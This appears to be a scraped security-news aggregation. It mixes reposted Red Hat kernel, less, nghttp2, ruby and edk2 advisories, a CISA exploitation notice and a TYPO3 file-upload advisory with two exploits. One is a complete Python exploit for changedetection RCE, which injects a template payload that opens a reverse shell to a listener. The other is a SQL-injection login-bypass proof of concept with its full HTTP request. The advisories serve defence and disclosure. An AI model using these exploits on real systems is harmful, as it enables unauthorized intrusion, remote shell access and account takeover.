Red Hat Security Advisory 2024-3528-03 - An update for kernel is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support. Issues addressed include null pointer and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3528.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel security update  
Advisory ID:        RHSA-2024:3528-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:3528  
Issue date:         2024-05-31  
Revision:           03  
CVE Names:          CVE-2023-2166  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: NULL pointer dereference in can_rcv_filter (CVE-2023-2166)

* kernel: Slab-out-of-bound read in compare_netdev_and_ip (CVE-2023-2176)

* kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (CVE-2024-1086)

* kernel: net: bridge: data races indata-races in br_handle_frame_finish() (CVE-2023-52578)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-2166

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2187813  
https://bugzilla.redhat.com/show_bug.cgi?id=2187931  
https://bugzilla.redhat.com/show_bug.cgi?id=2262126  
https://bugzilla.redhat.com/show_bug.cgi?id=2267758

Red Hat Security Advisory 2024-3528-03

Red Hat Security Advisory 2024-3513-03 - An update for less is now available for Red Hat Enterprise Linux 9. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3513.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: less security updateAdvisory ID:        RHSA-2024:3513-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3513Issue date:         2024-05-30Revision:           03CVE Names:          CVE-2024-32487====================================================================Summary: An update for less is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The \"less\" utility is a text file browser that resembles \"more\", but allows users to move backwards in the file as well as forwards. Since \"less\" does not read the entire input file at startup, it also starts more quickly than ordinary text editors.Security Fix(es):* less: OS command injection (CVE-2024-32487)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-32487References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2274980

Red Hat Security Advisory 2024-3513-03

Red Hat Security Advisory 2024-3501-03 - An update for nghttp2 is now available for Red Hat Enterprise Linux 8. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3501.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: nghttp2 security updateAdvisory ID:        RHSA-2024:3501-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3501Issue date:         2024-05-30Revision:           03CVE Names:          CVE-2024-28182====================================================================Summary: An update for nghttp2 is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:libnghttp2 is a library implementing the Hypertext Transfer Protocol version 2 (HTTP/2) protocol in C.Security Fix(es):* nghttp2: CONTINUATION frames DoS (CVE-2024-28182)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-28182References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2268639

Red Hat Security Advisory 2024-3501-03

Red Hat Security Advisory 2024-3500-03 - An update for the ruby:3.0 module is now available for Red Hat Enterprise Linux 8. Issues addressed include HTTP response splitting and denial of service vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3500.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: ruby:3.0 security updateAdvisory ID:        RHSA-2024:3500-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3500Issue date:         2024-05-30Revision:           03CVE Names:          CVE-2021-33621====================================================================Summary: An update for the ruby:3.0 module is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.Security Fix(es):* ruby/cgi-gem: HTTP response splitting in CGI (CVE-2021-33621)* ruby: ReDoS vulnerability in URI (CVE-2023-28755)* ruby: ReDoS vulnerability in Time (CVE-2023-28756)* ruby: RCE vulnerability with .rdoc_options in RDoc (CVE-2024-27281)* ruby: Buffer overread vulnerability in StringIO (CVE-2024-27280)* ruby: Arbitrary memory address read vulnerability with Regex search (CVE-2024-27282)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2021-33621References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2149706https://bugzilla.redhat.com/show_bug.cgi?id=2184059https://bugzilla.redhat.com/show_bug.cgi?id=2184061https://bugzilla.redhat.com/show_bug.cgi?id=2270749https://bugzilla.redhat.com/show_bug.cgi?id=2270750https://bugzilla.redhat.com/show_bug.cgi?id=2276810

Red Hat Security Advisory 2024-3500-03

Red Hat Security Advisory 2024-3497-03 - An update for edk2 is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include a buffer overflow vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3497.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: edk2 security updateAdvisory ID:        RHSA-2024:3497-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3497Issue date:         2024-05-30Revision:           03CVE Names:          CVE-2023-45230====================================================================Summary: An update for edk2 is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:EDK (Embedded Development Kit) is a project to enable UEFI support for VirtualMachines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM.Security Fix(es):* edk2: Buffer overflow when processing DNS Servers option in a DHCPv6 Advertise message (CVE-2023-45234)* edk2: Buffer overflow in the DHCPv6 client via a long Server ID option (CVE-2023-45230)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s)listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-45230References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2258685https://bugzilla.redhat.com/show_bug.cgi?id=2258697

Red Hat Security Advisory 2024-3497-03

jSQL Injection is a lightweight application used to find database information from a distant server. jSQL Injection is also part of the official penetration testing distribution Kali Linux and is included in various other distributions like Pentest Box, Parrot Security OS, ArchStrike and BlackArch Linux. This is the source code release.

jSQL Injection 0.97

changedetection versions 0.45.20 and below suffer from a remote code execution vulnerability.

    # Exploit Title: changedetection <= 0.45.20 Remote Code Execution (RCE)# Date: 5-26-2024# Exploit Author: Zach Crosman (zcrosman)# Vendor Homepage: changedetection.io# Software Link: https://github.com/dgtlmoon/changedetection.io# Version: <= 0.45.20# Tested on: Linux# CVE : CVE-2024-32651from pwn import *import requestsfrom bs4 import BeautifulSoupimport argparsedef start_listener(port):    listener = listen(port)    print(f"Listening on port {port}...")    conn = listener.wait_for_connection()    print("Connection received!")    context.newline = b'\r\n'    # Switch to interactive mode    conn.interactive()def add_detection(url, listen_ip, listen_port, notification_url=''):    session = requests.Session()        # First request to get CSRF token    request1_headers = {        "Cache-Control": "max-age=0",        "Upgrade-Insecure-Requests": "1",        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",        "Accept-Encoding": "gzip, deflate",        "Accept-Language": "en-US,en;q=0.9",        "Connection": "close"    }    response = session.get(url, headers=request1_headers)    soup = BeautifulSoup(response.text, 'html.parser')    csrf_token = soup.find('input', {'name': 'csrf_token'})['value']    print(f'Obtained CSRF token: {csrf_token}')    # Second request to submit the form and get the redirect URL    add_url = f"{url}/form/add/quickwatch"    add_url_headers = {  # Define add_url_headers here        "Origin": url,        "Content-Type": "application/x-www-form-urlencoded"    }    add_url_data = {        "csrf_token": csrf_token,        "url": "https://reddit.com/r/baseball",        "tags": '',        "edit_and_watch_submit_button": "Edit > Watch",        "processor": "text_json_diff"    }    post_response = session.post(add_url, headers=add_url_headers, data=add_url_data, allow_redirects=False)    # Extract the URL from the Location header    if 'Location' in post_response.headers:        redirect_url = post_response.headers['Location']        print(f'Redirect URL: {redirect_url}')    else:        print('No redirect URL found')        return    # Third request to add the changedetection url with ssti in notification config    save_detection_url = f"{url}{redirect_url}"    save_detection_headers = {  # Define save_detection_headers here        "Referer": redirect_url,        "Cookie": f"session={session.cookies.get('session')}"    }    save_detection_data = {        "csrf_token": csrf_token,        "url": "https://reddit.com/r/all",        "title": '',        "tags": '',        "time_between_check-weeks": '',        "time_between_check-days": '',        "time_between_check-hours": '',        "time_between_check-minutes": '',        "time_between_check-seconds": '30',        "filter_failure_notification_send": 'y',        "fetch_backend": 'system',        "webdriver_delay": '',        "webdriver_js_execute_code": '',        "method": 'GET',        "headers": '',        "body": '',        "notification_urls": notification_url,        "notification_title": '',        "notification_body": f"""        {{% for x in ().__class__.__base__.__subclasses__() %}}        {{% if "warning" in x.__name__ %}}        {{{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\\"{listen_ip}\\",{listen_port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\\"/bin/bash\\")'").read()}}}}        {{% endif %}}        {{% endfor %}}        """,        "notification_format": 'System default',        "include_filters": '',        "subtractive_selectors": '',        "filter_text_added": 'y',        "filter_text_replaced": 'y',        "filter_text_removed": 'y',        "trigger_text": '',        "ignore_text": '',        "text_should_not_be_present": '',        "extract_text": '',        "save_button": 'Save'    }    final_response = session.post(save_detection_url, headers=save_detection_headers, data=save_detection_data)    print('Final request made.')if __name__ == "__main__":    parser = argparse.ArgumentParser(description='Add detection and start listener')    parser.add_argument('--url', type=str, required=True, help='Base URL of the target site')    parser.add_argument('--port', type=int, help='Port for the listener', default=4444)    parser.add_argument('--ip', type=str, required=True, help='IP address for the listener')    parser.add_argument('--notification', type=str, help='Notification url if you don\'t want to use the system default')    args = parser.parse_args()    add_detection(args.url, args.ip, args.port, args.notification)    start_listener(args.port)

changedetection 0.45.20 Remote Code Execution

Online Payment Hub System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: Online Payment Hub System - SQLi Authentication Bypass# Date: 29.05.2024# Exploit Author: Hamit Avşar# Vendor Homepage: https://www.sourcecodester.com/php/15018/online-payment-hub-using-php-and-paypal-free-source-code.html# Software Link: https://www.sourcecodester.com/download-code?nid=15018&title=Online+Payment+Hub+using+PHP+and+PayPal+Free+Source+Code# Version: 1.0# Tested on: Windows 11, Kali Linux# Online Payment Hub System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.Steps To Reproduce:1 - Go to the login page http://localhost/oph/admin/login.php2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field.3 - Click on "Login" button and you are logged in as administrator.PoCRequestPOST /oph/classes/Login.php?f=login HTTP/1.1Host: localhostContent-Length: 42sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/oph/admin/login.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9f8v4097jovtf6a3igi4l6479iConnection: closeusername=admin'+or+'1'%3D'1&password=hamit--------------------------------------------------------------------------------------------------------------------------------responseHTTP/1.1 200 OKDate: Wed, 29 May 2024 17:15:28 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30X-Powered-By: PHP/8.0.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheAccess-Control-Allow-Origin: *Content-Length: 20Connection: closeContent-Type: text/html; charset=UTF-8{"status":"success"}

Online Payment Hub System 1.0 SQL Injection

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a security flaw impacting the Linux kernel to the Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.
Tracked as CVE-2024-1086 (CVSS score: 7.8), the high-severity issue relates to a use-after-free bug in the netfilter component that permits a local attacker to elevate privileges

CISA Alerts Federal Agencies to Patch Actively Exploited Linux Kernel Flaw

Due to missing file extensions in $GLOBALS['TYPO3_CONF_VARS']['BE'][‘fileDenyPattern’], backend users are allowed to upload *.phar, *.shtml, *.pl or *.cgi files which can be executed in certain web server setups. A valid backend user account is needed in order to exploit this vulnerability.

Derivatives of Debian GNU Linux are handling *.phar files as PHP applications since PHP 7.1 (for unofficial packages) and PHP 7.2 (for official packages).

The file extension *.shtml is bound to server side includes which are not enabled per default in most common Linux based distributions. File extension *.pl and *.cgi require additional handlers to be configured which is also not the case in most common distributions (except for /cgi-bin/ location).



Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  GHSA-f9hr-7cfq-mjg2

**TYPO3 Arbitrary Code Execution via File List Module**

High severity GitHub Reviewed Published May 30, 2024 to the GitHub Advisory Database • Updated May 30, 2024

**Package**

composer typo3/cms-core (Composer)

**Affected versions**

\>= 8.0.0, < 8.7.23

\>= 9.0.0, < 9.5.4

**Patched versions**

8.7.23

9.5.4

**Description**

Published to the GitHub Advisory Database

May 30, 2024

Last updated

May 30, 2024

Tag

#linux